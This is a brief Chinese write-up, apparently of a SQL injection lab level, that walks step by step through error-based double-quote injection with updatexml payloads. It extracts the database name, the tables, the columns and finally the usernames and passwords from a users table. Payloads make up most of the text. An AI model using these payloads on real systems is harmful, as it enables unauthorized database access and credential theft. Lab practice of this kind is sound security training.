这一关依旧是正确没有回显 错误存在回显 所以我们可以利用报错注入进行解题
首先我们输入admin" 发现报错信息 从中我们可以知道注入类型为双引号注入
所以我们进行以下输入以作证我们的想法
admin"#
显示登陆成功 只是缺乏回显
然后我们进行爆库操作
输入如下
admin" and updatexml(1,concat(0x7e,database(),0x7e),1)#
回显如下
然后继续报表操作
输入如下
admin" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1);#
回显如下
然后进行爆字段操作
输入如下
admin" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1);#
回显如下
最后进行爆用户名和密码相关信息的操作
输入如下
admin" and updatexml(1,concat(0x7e,(select group_concat(username,password) from users),0x7e),1);#
回显如下
成功了!!!嗨嗨